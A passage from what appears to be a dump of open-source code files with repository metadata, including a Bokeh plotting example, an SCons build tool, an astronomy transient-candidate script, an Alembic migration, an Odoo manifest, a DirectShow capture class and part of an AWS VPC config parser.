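# One big wedge per bacterium (the +1 leaves an empty wedge for the legend);
# each wedge is split into sevenths so the three drug bars sit at alternating
# small-angle offsets with gaps in between.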
x = np.zeros(len(df))
y = np.zeros(len(df))
output_server("burtin")
p = figure(plot_width=width, plot_height=height, title="",
x_axis_type=None, y_axis_type=None,
x_range=[-420, 420], y_range=[-420, 420],
min_border=0, outline_line_color="black",
background_fill="#f0e1d2", border_fill="#f0e1d2")
p.line(x+1, y+1, alpha=0)
# annular wedges
angles = np.pi/2 - big_angle/2 - df.index.to_series()*big_angle
colors = [gram_color[gram] for gram in df.gram]
p.annular_wedge(
x, y, inner_radius, outer_radius, -big_angle+angles, angles, color=colors,
)
# small wedges
p.annular_wedge(x, y, inner_radius, rad(df.penicillin),
-big_angle+angles+5*small_angle, -big_angle+angles+6*small_angle,
color=drug_color['Penicillin'])
p.annular_wedge(x, y, inner_radius, rad(df.streptomycin),
-big_angle+angles+3*small_angle, -big_angle+angles+4*small_angle,
color=drug_color['Streptomycin'])
p.annular_wedge(x, y, inner_radius, rad(df.neomycin),
-big_angle+angles+1*small_angle, -big_angle+angles+2*small_angle,
color=drug_color['Neomycin'])
# circular axes and labels
labels = np.power(10.0, np.arange(-3, 4))
radii = a * np.sqrt(np.log(labels * 1E4)) + b
p.circle(x, y, radius=radii, fill_color=None, line_color="white")
p.text(x[:-1], radii[:-1], [str(r) for r in labels[:-1]],
text_font_size="8pt", text_align="center", text_baseline="middle")
# radial axes
p.annular_wedge(x, y, inner_radius-10, outer_radius+10,
-big_angle+angles, -big_angle+angles, color="black")
# bacteria labels
xr = radii[0]*np.cos(np.array(-big_angle/2 + angles))
yr = radii[0]*np.sin(np.array(-big_angle/2 + angles))
label_angle=np.array(-big_angle/2+angles)
label_angle[label_angle < -np.pi/2] += np.pi # easier to read labels on the left side
p.text(xr, yr, df.bacteria, angle=label_angle,
text_font_size="9pt", text_align="center", text_baseline="middle")
# OK, these hand-drawn legends are pretty clunky; they will be improved in a future release
p.circle([-40, -40], [-370, -390], color=list(gram_color.values()), radius=5)
p.text([-30, -30], [-370, -390], text=["Gram-" + gr for gr in gram_color.keys()],
text_font_size="7pt", text_align="left", text_baseline="middle")
p.rect([-40, -40, -40], [18, 0, -18], width=30, height=13,
color=list(drug_color.values()))
p.text([-15, -15, -15], [18, 0, -18], text=list(drug_color.keys()),
text_font_size="9pt", text_align="left", text_baseline="middle")
p.xgrid.grid_line_color = None
p.ygrid.grid_line_color = None
show(p)
|
akloster/bokeh
|
examples/plotting/server/burtin.py
|
Python
|
bsd-3-clause
| 4,826 | 0.005387 |
#!/usr/bin/env python
#
# Copyright (c) 2009, Roboterclub Aachen e.V.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the Roboterclub Aachen e.V. nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY ROBOTERCLUB AACHEN E.V. ''AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL ROBOTERCLUB AACHEN E.V. BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
# THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import re
import SCons
import SCons.Errors
# TODO make this more robust against whitespace etc.
includeExpression = re.compile(r'<include>(\S+)</include>', re.M)
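# Matches directives such as '<include>robot/packets.xml</include>' and
# captures the path ('robot/packets.xml') as group(1); the example path is
# illustrative only.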
# -----------------------------------------------------------------------------
def find_includes(env, file, include_path):
""" Find include directives in an XML file """
files = []
line_count = 0
for line in open(file).readlines():
line_count = line_count + 1
match = includeExpression.search(line)
if match:
filename = match.group(1)
relative_to_file = os.path.join(os.path.dirname(os.path.abspath(file)), filename)
relative_to_include_path = os.path.join(include_path, filename)
# 1.) the include file name can be absolute
if os.path.isabs(filename):
files.append(filename)
# 2.) it could be a path relative to the file's path;
# this works just like #include "{filename}" in C/C++
elif os.path.isfile(relative_to_file):
files.append(relative_to_file)
# 3.) it could be a path relative to the include path
elif os.path.isfile(relative_to_include_path):
files.append(relative_to_include_path)
# 4.) Error!
else:
env.Error("Could not find include file '%s' in '%s:%s'" % (filename, file, line_count))
return files
def xml_include_scanner(node, env, path, arg=None):
""" Generates the dependencies for the XML files """
abspath, targetFilename = os.path.split(node.get_abspath())
stack = [targetFilename]
dependencies = [targetFilename]
while stack:
nextFile = stack.pop()
files = find_includes(env, os.path.join(abspath, nextFile), abspath)
for file in files:
if file not in dependencies:
stack.append(file)
dependencies.extend(files)
dependencies.remove(targetFilename)
return dependencies
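# The scanner resolves includes transitively: every discovered file is pushed
# onto the stack and scanned in turn, so nested <include> chains end up as a
# flat dependency list for SCons.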
# -----------------------------------------------------------------------------
def packet_emitter(target, source, env):
try:
path = env['path']
except KeyError:
path = '.'
target = [os.path.join(path, "packets.cpp"),
os.path.join(path, "packets.hpp")]
return (target, source)
def identifier_emitter(target, source, env):
try:
path = env['path']
except KeyError:
path = '.'
target = [os.path.join(path, "identifier.hpp")]
return (target, source)
def postman_emitter(target, source, env):
try:
path = env['path']
except KeyError:
path = '.'
target = [os.path.join(path, "postman.cpp"),
os.path.join(path, "postman.hpp")]
return (target, source)
def communication_emitter(target, source, env):
try:
path = env['path']
except KeyError:
path = '.'
target = [os.path.join(path, "communication.hpp")]
return (target, source)
def xpcc_task_caller_emitter(target, source, env):
try:
path = env['path']
except KeyError:
path = '.'
target = [os.path.join(path, "caller.hpp")]
return (target, source)
# -----------------------------------------------------------------------------
def generate(env, **kw):
env.SetDefault(XPCC_SYSTEM_DESIGN_SCANNERS = {})
env['XPCC_SYSTEM_DESIGN_SCANNERS']['XML'] = SCons.Script.Scanner(
function = xml_include_scanner,
skeys = ['.xml'])
env['BUILDERS']['SystemCppPackets'] = \
SCons.Script.Builder(
action = SCons.Action.Action(
'python "${XPCC_SYSTEM_BUILDER}/cpp_packets.py" ' \
'--source_path ${TARGETS[0].dir} ' \
'--header_path ${TARGETS[1].dir} ' \
'--dtdpath "${dtdPath}" ' \
'--namespace "${namespace}" ' \
'$SOURCE',
cmdstr="$SYSTEM_CPP_PACKETS_COMSTR"),
emitter = packet_emitter,
source_scanner = env['XPCC_SYSTEM_DESIGN_SCANNERS']['XML'],
single_source = True,
target_factory = env.fs.Entry,
src_suffix = ".xml")
env['BUILDERS']['SystemCppIdentifier'] = \
SCons.Script.Builder(
action = SCons.Action.Action(
'python "${XPCC_SYSTEM_BUILDER}/cpp_identifier.py" ' \
'--outpath ${TARGET.dir} ' \
'--dtdpath "${dtdPath}" ' \
'--namespace "${namespace}" ' \
'$SOURCE',
cmdstr="$SYSTEM_CPP_IDENTIFIER_COMSTR"),
emitter = identifier_emitter,
source_scanner = env['XPCC_SYSTEM_DESIGN_SCANNERS']['XML'],
single_source = True,
target_factory = env.fs.Entry,
src_suffix = ".xml")
env['BUILDERS']['SystemCppPostman'] = \
SCons.Script.Builder(
action = SCons.Action.Action(
'python "${XPCC_SYSTEM_BUILDER}/cpp_postman.py" ' \
'--container "${container}" ' \
'--outpath ${TARGET.dir} ' \
'--dtdpath "${dtdPath}" ' \
'--namespace "${namespace}" ' \
'$SOURCE',
cmdstr="$SYSTEM_CPP_POSTMAN_COMSTR"),
emitter = postman_emitter,
source_scanner = env['XPCC_SYSTEM_DESIGN_SCANNERS']['XML'],
single_source = True,
target_factory = env.fs.Entry,
src_suffix = ".xml")
env['BUILDERS']['SystemCppCommunication'] = \
SCons.Script.Builder(
action = SCons.Action.Action(
'python "${XPCC_SYSTEM_BUILDER}/cpp_communication.py" ' \
'--outpath ${TARGET.dir} ' \
'--dtdpath "${dtdPath}" ' \
'--namespace "${namespace}" ' \
'$SOURCE',
cmdstr="$SYSTEM_CPP_COMMUNICATION_COMSTR"),
emitter = communication_emitter,
source_scanner = env['XPCC_SYSTEM_DESIGN_SCANNERS']['XML'],
single_source = True,
target_factory = env.fs.Entry,
src_suffix = ".xml")
env['BUILDERS']['SystemCppXpccTaskCaller'] = \
SCons.Script.Builder(
action = SCons.Action.Action(
'python "${XPCC_SYSTEM_BUILDER}/cpp_xpcc_task_caller.py" ' \
'--outpath ${TARGET.dir} ' \
'--dtdpath "${dtdPath}" ' \
'--namespace "${namespace}" ' \
'$SOURCE',
cmdstr="$SYSTEM_CPP_XPCC_TASK_CALLER_COMSTR"),
emitter = xpcc_task_caller_emitter,
source_scanner = env['XPCC_SYSTEM_DESIGN_SCANNERS']['XML'],
single_source = True,
target_factory = env.fs.Entry,
src_suffix = ".xml")
if SCons.Script.ARGUMENTS.get('verbose') != '1':
env['SYSTEM_CPP_PACKETS_COMSTR'] = "Generate packets from: $SOURCE"
env['SYSTEM_CPP_IDENTIFIER_COMSTR'] = "Generate identifier from: $SOURCE"
env['SYSTEM_CPP_POSTMAN_COMSTR'] = "Generate postman from: $SOURCE"
env['SYSTEM_CPP_COMMUNICATION_COMSTR'] = "Generate communication stubs from: $SOURCE"
env['SYSTEM_CPP_XPCC_TASK_CALLER_COMSTR'] = "Generate xpcc task callers from: $SOURCE"
def exists(env):
return True
|
chrism333/xpcc
|
scons/site_tools/system_design.py
|
Python
|
bsd-3-clause
| 7,787 | 0.038012 |
from sacred import Experiment
ex = Experiment('my_commands')
@ex.config
def cfg():
name = 'kyle'
@ex.command
def greet(name):
print('Hello {}! Nice to greet you!'.format(name))
@ex.command
def shout():
print('WHAZZZUUUUUUUUUUP!!!????')
@ex.automain
def main():
print('This is just the main command. Try greet or shout.')
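# Example invocations (sketch): 'python my_command.py greet' runs the greet
# command with the default config, and 'python my_command.py greet with
# name=alice' overrides the name option on the command line.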
|
zzsza/TIL
|
python/sacred/my_command.py
|
Python
|
mit
| 345 | 0.002899 |
# -*- coding: utf-8 -*-
"""
Created on Thu Jul 7 14:53:55 2016
@author: nu
"""
import numpy as np
import timeit, os, sys
from astropy.coordinates import SkyCoord
from astropy.table import Column
from astroquery.vizier import Vizier
from astropy import units as u
from TAROT_PL import TarotPIP
from Filter_data import (reoffset, Lsep_candi, tbmagnitude, XYlimit, W_to_P)
#from Data_graph import candidateplot
from renametxt import Renametxt
""" This algorithm will run a file at a time by in put directly """
start = timeit.default_timer()
#start import file
input_fits = raw_input("Please put FITS [/path_file/file.fits]: "); fitsfile = Renametxt(input_fits)
savefolder = '/home/tarot/Documents/Data_Output/' # output directory; change it here if needed
if not os.path.exists(savefolder):
savefolder = '/tmp/'
print("Output is at %s" %savefolder)
#Use algorithm from TarotPip
""" SExdata is data extract by Sextractor which keep in 'output.cat'
Catalog is obtain from USNO-B1.0 and store in Table format
Ccata is the coordinate of catalog in SkyCoord [RA, DEC]
Cdata is the coordinate of object from image in SkyCoord [RA, DEC]"""
TAROT_data = TarotPIP(fitsfile); TAROT_data.fitsfileinfo();
try:
SExdata, Catalog, Ccata, Cdata = TAROT_data.readData()
except(ValueError, IOError):
print("%s: check data table, catalog\n"%TAROT_data.image)
sys.exit(0)
#hdu = fits.open(fitsfile); tbdata = hdu[0].data; hdu.close();
""" Start to math by using 'match_to_catalog_sky' import from 'Astropy'
idx is the index of object in catalog that math with Cdata
d2d is the angular separation between Ccata and Cdata in degree
d3d is 3 dimension distace [we don't use it
matches are the closest Ccata with Cdata in SkyCoord [RA, DEC]"""
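# For reference, astropy's SkyCoord.match_to_catalog_sky(catalog) returns, for
# each source coordinate, the index of the nearest catalog entry together with
# its on-sky and 3-D separations: idx, d2d, d3d = Cdata.match_to_catalog_sky(Ccata).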
try:
idx, d2d, d3d, matches = TAROT_data.Data_match_catalog()
except (ValueError, IOError):
print("\n Matching error !!!, check 'Data_match_catalog function'")
sys.exit(1)
# Calibrate data against the catalog
""" Calibration the object in image to catalog and then re-matching again
idx, d2d, matches are the same meaning but value and coordinate may change
Cdata_offset is the new SkyCoord of Cdata after calibration (or off-set)"""
try:
idx, d2d, d3d, matches, Cdata_offset = reoffset(d2d, matches, Cdata, Ccata)
except (ValueError, IOError):
print("\n offset coordinate error !!!, check 'reoffset function'")
sys.exit(2)
# Select candidates with a high angular distance (assumed to be new objects in the field)
""" idx_candi_catalog is the idx for catalog
idx_candi_data is the idx for the data [Caution: there are two SkyCoords for the data]"""
try:
idx_candi_catalog, idx_candi_data = Lsep_candi(3, idx, d2d, SExdata) #10*std of d2d
except(ValueError, IOError):
print("\n Candidate sellected error !!!, check 'Lsep_candi function'")
sys.exit(3)
# Cut candidates near the edge of the image
try:
XYcandi, idx_XYcandi_data, idx_XYcandi_cata = XYlimit(Cdata_offset,idx_candi_data, idx_candi_catalog, TAROT_data.new_wcs)
except(ValueError, IOError):
print("\nProblem with limit candidate in the edge !!!, check 'idx_XYcandi_cata' function")
sys.exit(4)
# Convert world coordinates to pixel coordinates
try:
Catalog_WTP, Matches_WTP, Cdata_offset_WTP = W_to_P(Ccata, Cdata_offset, matches, TAROT_data.new_wcs)
except(ValueError, IOError):
print("\n Convert wcs error!!!, check 'W_to_P function'")
sys.exit(5)
# Select candidates by local angular separation (among 10 neighbouring objects)
""" d2d_candi is in dagree, the candidate sellected by using the angular separation
Cdata_candi, Ccata_candi are the SkyCoord [RA, DEC] of candidate
for data(off-set) and catalog, repectively but
cata_candi is the information of candidate in catalog (all info. available)"""
#d2d_candi = d2d[idx_candi_data]
Cdata_candi = Cdata_offset[idx_XYcandi_data]
cata_candi = Catalog[idx_XYcandi_cata]
Ccata_candi = Ccata[idx_XYcandi_cata]
# Magnitude comparison and selection
""" There is a mismatch between the magnitudes of the data and the catalog """
tbmag = tbmagnitude(idx, SExdata, Catalog)
Cdata_col_ra = Column(Cdata_offset.ra, name='ra')
Cdata_col_dec = Column(Cdata_offset.dec, name='dec')
Ang_sept_candidate = Column((d2d.arcsec*u.arcsec), name='Separation')
tbmag.add_column(Cdata_col_ra,index=None)
tbmag.add_column(Cdata_col_dec,index=None)
tbmag.add_column(Ang_sept_candidate,index=None)
Candi_d2d = tbmag[idx_XYcandi_data]
""" Candidate can be create in a tables,
by angular distance (d2d), in ASCII or HTML file
"""
#HTML
#savename_html = os.path.join(savefolder, TAROT_data.fname + 'html_d2d_candidate.dat')
#Candi_d2d.write(savename_html, format='ascii.html')
#ASCII
#savename_ascii = os.path.join(savefolder, TAROT_data.fname + 'ascii_d2d_candidate.dat')
#Candi_d2d.write(savename_ascii, format='ascii')
print(':::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::')
print('\nMedian of separation : STD %3.2f\" : %3.2f\"\n' %(np.median(d2d.arcsec), np.std(d2d.arcsec)))
print('Number of candidate\t\t:%d\n' %len(Candi_d2d))
print('-----------------------------------------------------------------\n')
print Candi_d2d
print("\n")
line0_reg_ds9 = "global color=green dashlist=8 3 width=1 font=\"helvetica 10 normal roman\" select=1 highlite=1 dash=0 fixed=0 edit=1 move=1 delete=1 include=1 source=1\n"
line1_reg_ds9 = "icrs\n"
Candi_reg = open("/tmp/Candi_region_Gaia.reg", 'w')
Candi_reg.write(line0_reg_ds9)
Candi_reg.write(line1_reg_ds9)
for i in range(len(Candi_d2d)):
Candi_reg.write("circle(%f, %f, 16.0\") # color=red text={Gaia_%d}\n" %(Candi_d2d["ra"][i], Candi_d2d["dec"][i], i))
Candi_reg.close()
#print("circle(%f, %f, 16.0\") # color=red text={Gaia_%d}" %(Candi_d2d["ra"][i], Candi_d2d["dec"][i], i))
print("\n")
print(':::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::')
# Filter candidates by checking against the USNO-B1.0 and NOMAD1 catalogs
confirm_1 = []; confirm_2 = [];
confirm_candi_0 = []; confirm_candi_1 = []; confirm_candi_2 = [];
for i in range(len(Cdata_candi)):
confirm_candi_1 = Vizier(catalog="USNO-B1.0", row_limit=-1).query_region(Cdata_candi[i], radius=10*u.arcsec, verbose=False)
if not confirm_candi_1:
confirm_1.append(i)
for i in range(len(Cdata_candi)):
confirm_candi_2 = Vizier(catalog="NOMAD1", row_limit=-1).query_region(Cdata_candi[i], radius=10*u.arcsec, verbose=False)
if not confirm_candi_2:
confirm_2.append(i)
# Write candidates to disk
savename_ascii = os.path.join(savefolder,TAROT_data.fname + '.candi.dat')
info_candi_1 = Candi_d2d[confirm_1]
info_candi_1.write(savename_ascii, format='ascii') # Candidate after check with USNO-B1.0 and write to disk
info_candi_2 = Candi_d2d[confirm_2]
print("\n::::::::::::::::::::::: Potential candidate check with USNO-B1.0 :::::::::::::::::::::\n")
try:
print(info_candi_1)
print("\n")
Candi_reg1 = open("/tmp/Candi_region_USNO.txt", 'w')
Candi_reg1.write(line0_reg_ds9)
Candi_reg1.write(line1_reg_ds9)
for i in range(len(info_candi_1)):
Candi_reg1.write("circle(%f, %f, 16.0\") # color=blue text={USNO_%d}\n" %(info_candi_1["ra"][i], info_candi_1["dec"][i], i))
Candi_reg1.close()
print("Number of Candidate %d" %len(info_candi_1))
print("\n"*2)
except(ValueError, NameError):
print("No candidate in USNO-B1.0\n\n")
print("\n::::::::::::::::::::::: Potential candidate check with NOMAD1 :::::::::::::::::::::\n")
try:
print(info_candi_2)
print("\n")
Candi_reg2 = open("/tmp/Candi_region_NOMAD1.txt", 'w')
Candi_reg2.write(line0_reg_ds9)
Candi_reg2.write(line1_reg_ds9)
for i in range(len(info_candi_2)):
Candi_reg2.write("circle(%f, %f, 16.0\") # color=green text={NOMAD1_%d}\n" %(info_candi_2["ra"][i], info_candi_2["dec"][i], i))
Candi_reg2.close()
print("Number of Candidate %d" %len(info_candi_2))
print("\n"*2)
except(ValueError, NameError):
print("No candidate in NOMAD1\n\n")
stop = timeit.default_timer()
runtime = stop - start
print("\nRuntime = %2.2f" %runtime)
#graph0 = candidateplot(TAROT_data.tbdata,XYcandi['Xpix'],XYcandi['Ypix'], 'Candidate by angular separation')
|
Noysena/TAROT
|
SFile.py
|
Python
|
gpl-3.0
| 8,161 | 0.010538 |
"""alter database for mysql compatibility
Revision ID: 9be372ec38bc
Revises: 4328f2c08f05
Create Date: 2020-02-16 15:43:35.276655
"""
from alembic import op
import sqlalchemy as sa
from docassemble.webapp.database import dbtableprefix, dbprefix, daconfig
import sys
# revision identifiers, used by Alembic.
revision = '9be372ec38bc'
down_revision = '4328f2c08f05'
branch_labels = None
depends_on = None
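# MySQL cannot index unbounded TEXT columns, so this migration narrows the
# affected columns to bounded VARCHARs; on PostgreSQL the conversion is skipped
# unless 'force text to varchar upgrade' is set in the configuration.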
def upgrade():
if dbprefix.startswith('postgresql') and not daconfig.get('force text to varchar upgrade', False):
sys.stderr.write("Not changing text type to varchar type because underlying database is PostgreSQL\n")
else:
op.alter_column(
table_name='userdict',
column_name='filename',
type_=sa.String(255)
)
op.alter_column(
table_name='userdictkeys',
column_name='filename',
type_=sa.String(255)
)
op.alter_column(
table_name='chatlog',
column_name='filename',
type_=sa.String(255)
)
op.alter_column(
table_name='uploads',
column_name='filename',
type_=sa.String(255)
)
op.alter_column(
table_name='uploads',
column_name='yamlfile',
type_=sa.String(255)
)
op.alter_column(
table_name='objectstorage',
column_name='key',
type_=sa.String(1024)
)
op.alter_column(
table_name='speaklist',
column_name='filename',
type_=sa.String(255)
)
op.alter_column(
table_name='shortener',
column_name='filename',
type_=sa.String(255)
)
op.alter_column(
table_name='shortener',
column_name='key',
type_=sa.String(255)
)
op.alter_column(
table_name='machinelearning',
column_name='key',
type_=sa.String(1024)
)
op.alter_column(
table_name='machinelearning',
column_name='group_id',
type_=sa.String(1024)
)
op.alter_column(
table_name='globalobjectstorage',
column_name='key',
type_=sa.String(1024)
)
op.create_index(dbtableprefix + 'ix_uploads_yamlfile', 'uploads', ['yamlfile'])
def downgrade():
op.alter_column(
table_name='userdict',
column_name='filename',
type_=sa.Text()
)
op.alter_column(
table_name='userdictkeys',
column_name='filename',
type_=sa.Text()
)
op.alter_column(
table_name='chatlog',
column_name='filename',
type_=sa.Text()
)
op.alter_column(
table_name='uploads',
column_name='filename',
type_=sa.Text()
)
op.alter_column(
table_name='uploads',
column_name='yamlfile',
type_=sa.Text()
)
op.alter_column(
table_name='objectstorage',
column_name='key',
type_=sa.Text()
)
op.alter_column(
table_name='speaklist',
column_name='filename',
type_=sa.Text()
)
op.alter_column(
table_name='shortener',
column_name='filename',
type_=sa.Text()
)
op.alter_column(
table_name='shortener',
column_name='key',
type_=sa.Text()
)
op.alter_column(
table_name='machinelearning',
column_name='key',
type_=sa.Text()
)
op.alter_column(
table_name='machinelearning',
column_name='group_id',
type_=sa.Text()
)
op.alter_column(
table_name='globalobjectstorage',
column_name='key',
type_=sa.Text()
)
op.drop_index(dbtableprefix + 'ix_uploads_yamlfile', table_name='uploads')
|
jhpyle/docassemble
|
docassemble_webapp/docassemble/webapp/alembic/versions/9be372ec38bc_alter_database_for_mysql_compatibility.py
|
Python
|
mit
| 3,895 | 0.001284 |
# -*- coding: utf-8 -*-
##############################################################################
#
# This file is part of CampOS Event,
# an Odoo module.
#
# Copyright (c) 2015 Stein & Gabelgaard ApS
# http://www.steingabelgaard.dk
# Hans Henrik Gaelgaard
#
# CampOS Event is free software:
# you can redistribute it and/or modify it under the terms of the GNU
# Affero General Public License as published by the Free Software
# Foundation,either version 3 of the License, or (at your option) any
# later version.
#
# CampOS Event is distributed
# in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
# even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with CampOS Event.
# If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': "CampOS Event",
'summary': """
Scout Camp Management Solution""",
# 'description': put the module description in README.rst
'author': "Hans Henrik Gabelgaard",
'website': "http://www.steingabelgaard.dk",
# Categories can be used to filter modules in modules listing
# Check http://goo.gl/0TfwzD for the full list
'category': 'Uncategorized',
'version': '0.1',
'license': 'AGPL-3',
# any module necessary for this one to work correctly
'depends': [
'base',
'mail',
'event',
'website',
'portal',
'survey',
'website_event_register_free',
'base_suspend_security',
'website_jquery_ui',
'base_geoengine',
'geoengine_partner',
'web_widget_color',
'project_issue',
'project_model_to_issue',
'website_event_track',
'web_widget_datepicker_options',
],
# always loaded
'data': [
'views/res_country.xml',
'views/product_template.xml',
'views/campos_staff_del_prod.xml',
'security/campos_event_security.xml',
'security/campos_subcamp_exception.xml',
'security/campos_subcamp.xml',
'security/campos_registration_view.xml',
'security/campos_function_view.xml',
'security/ir.model.access.csv',
'security/ir.rule.csv',
'security/campos_staff_del_prod.xml',
'data/campos.municipality.csv',
'data/campos.scout.org.csv',
'data/job_ask_project.xml',
'views/templates.xml',
'views/participant_view.xml',
'views/event_registration_view.xml',
'views/committee_view.xml',
'views/municipality_view.xml',
"views/scout_org_view.xml",
"views/res_partner_view.xml",
"views/job_view.xml",
"views/job_template.xml",
"views/mail_templates.xml",
"views/confirm_template.xml",
"views/event_view.xml",
#"views/portal_menu.xml",
"views/res_users_view.xml",
'views/campos_menu.xml',
'views/campos_subcamp_exception.xml',
'views/campos_subcamp.xml',
'views/event_partner_reg_template.xml',
'views/meeting_proposal_template.xml',
'views/event_track_view.xml',
'views/campos_camp_area.xml',
'data/camp_area_committee.xml',
'data/participant_number.xml',
'security/campos_par_tag.xml',
'views/campos_par_tag.xml',
'security/campos_reg_tag.xml',
'views/campos_reg_tag.xml',
'views/extern_jobber_template.xml',
],
# only loaded in demonstration mode
'demo': [
'demo.xml',
],
}
|
sl2017/campos
|
campos_event/__openerp__.py
|
Python
|
agpl-3.0
| 3,874 | 0.001807 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# IkaLog
# ======
# Copyright (C) 2015 Takeshi HASEGAWA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import time
import threading
import cv2
from ikalog.utils import *
from ikalog.inputs.win.videoinput_wrapper import VideoInputWrapper
from ikalog.inputs import VideoInput
class DirectShow(VideoInput):
# override
def _enumerate_sources_func(self):
return self._videoinput_wrapper.get_device_list()
def read_raw(self):
if self._device_id is None:
return None
frame = self._videoinput_wrapper.get_pixels(
self._device_id,
parameters=(
self._videoinput_wrapper.VI_BGR +
self._videoinput_wrapper.VI_VERTICAL_FLIP
)
)
return frame
# override
def _read_frame_func(self):
frame = self.read_raw()
return frame
# override
def _initialize_driver_func(self):
pass
# override
def _cleanup_driver_func(self):
pass
# override
def _is_active_func(self):
return (self._device_id is not None)
# override
def _select_device_by_index_func(self, source, width=1280, height=720, framerate=59.94):
device_id = int(source)
vi = self._videoinput_wrapper
self.lock.acquire()
try:
if self._device_id is not None:
raise Exception('Need to deinit the device')
formats = [
{'width': width, 'height': height, 'framerate': None},
{'width': width, 'height': height, 'framerate': framerate},
]
for fmt in formats:
if fmt['framerate']:
vi.set_framerate(device_id, fmt['framerate'])
retval = vi.init_device(
device_id,
flags=self._videoinput_wrapper.DS_RESOLUTION,
width=fmt['width'],
height=fmt['height'],
)
if retval:
self._source_width = vi.get_frame_width(device_id)
self._source_height = vi.get_frame_height(device_id)
success = \
(width == self._source_width) and (
height == self._source_height)
if success or (not self.cap_optimal_input_resolution):
self._device_id = device_id
break
vi.deinit_device(device_id)
# end of for loop
if self._device_id is None:
IkaUtils.dprint(
'%s: Failed to init the capture device %d' %
(self, device_id)
)
finally:
self.lock.release()
# override
def _select_device_by_name_func(self, source):
IkaUtils.dprint('%s: Select device by name "%s"' % (self, source))
try:
index = self.enumerate_sources().index(source)
except ValueError:
IkaUtils.dprint('%s: Input "%s" not found' % (self, source))
return False
IkaUtils.dprint('%s: "%s" -> %d' % (self, source, index))
self._select_device_by_index_func(index)
def __init__(self):
self.strict_check = False
self._device_id = None
self._warned_resolution = False
self._videoinput_wrapper = VideoInputWrapper()
super(DirectShow, self).__init__()
if __name__ == "__main__":
obj = DirectShow()
list = obj.enumerate_sources()
for n in range(len(list)):
IkaUtils.dprint("%d: %s" % (n, list[n]))
dev = input("Please input number (or name) of capture device: ")
obj.select_source(dev)
k = 0
while k != 27:
frame = obj.read_frame()
if frame is not None:
cv2.imshow(obj.__class__.__name__, frame)
k = cv2.waitKey(1)
if k == ord('s'):
import time
cv2.imwrite('screenshot_%d.png' % int(time.time()), frame)
|
hasegaw/IkaLog
|
ikalog/inputs/win/directshow.py
|
Python
|
apache-2.0
| 4,592 | 0.000436 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License
from keystone.contrib.extensions.admin.osksadm.extension_handler\
import ExtensionHandler as KSADMExtensionHandler
from keystone.contrib.extensions.admin.oskscatalog.extension_handler\
import ExtensionHandler as KSCATALOGExtensionHandler
def configure_extensions(mapper, options):
#TODO: Make extensions configurable.
ksadm_extension_handler = KSADMExtensionHandler()
ksadm_extension_handler.map_extension_methods(mapper, options)
kscatalog_extension_handler = KSCATALOGExtensionHandler()
kscatalog_extension_handler.map_extension_methods(mapper, options)
|
genius1611/Keystone
|
keystone/contrib/extensions/admin/__init__.py
|
Python
|
apache-2.0
| 1,232 | 0.000812 |
# -*- coding: utf-8 -*-
import copy
import netaddr
from opinel.utils.aws import get_name
from opinel.utils.globals import manage_dictionary
from opinel.utils.fs import load_data, read_ip_ranges
from AWSScout2.utils import ec2_classic, get_keys
from AWSScout2.configs.regions import RegionalServiceConfig, RegionConfig
from AWSScout2.configs.vpc import VPCConfig as SingleVPCConfig
########################################
# Globals
########################################
protocols_dict = load_data('protocols.json', 'protocols')
########################################
# VPCRegionConfig
########################################
class VPCRegionConfig(RegionConfig):
"""
VPC configuration for a single AWS region
"""
def parse_customer_gateway(self, global_params, region, cgw):
cgw['id'] = cgw.pop('CustomerGatewayId')
self.customer_gateways[cgw['id']] = cgw
def parse_flow_log(self, global_params, region, fl):
"""
:param global_params:
:param region:
:param fl:
:return:
"""
get_name(fl, fl, 'FlowLogId')
fl_id = fl.pop('FlowLogId')
self.flow_logs[fl_id] = fl
def parse_network_acl(self, global_params, region, network_acl):
"""
:param global_params:
:param region:
:param network_acl:
:return:
"""
vpc_id = network_acl['VpcId']
network_acl['id'] = network_acl.pop('NetworkAclId')
get_name(network_acl, network_acl, 'id')
manage_dictionary(network_acl, 'rules', {})
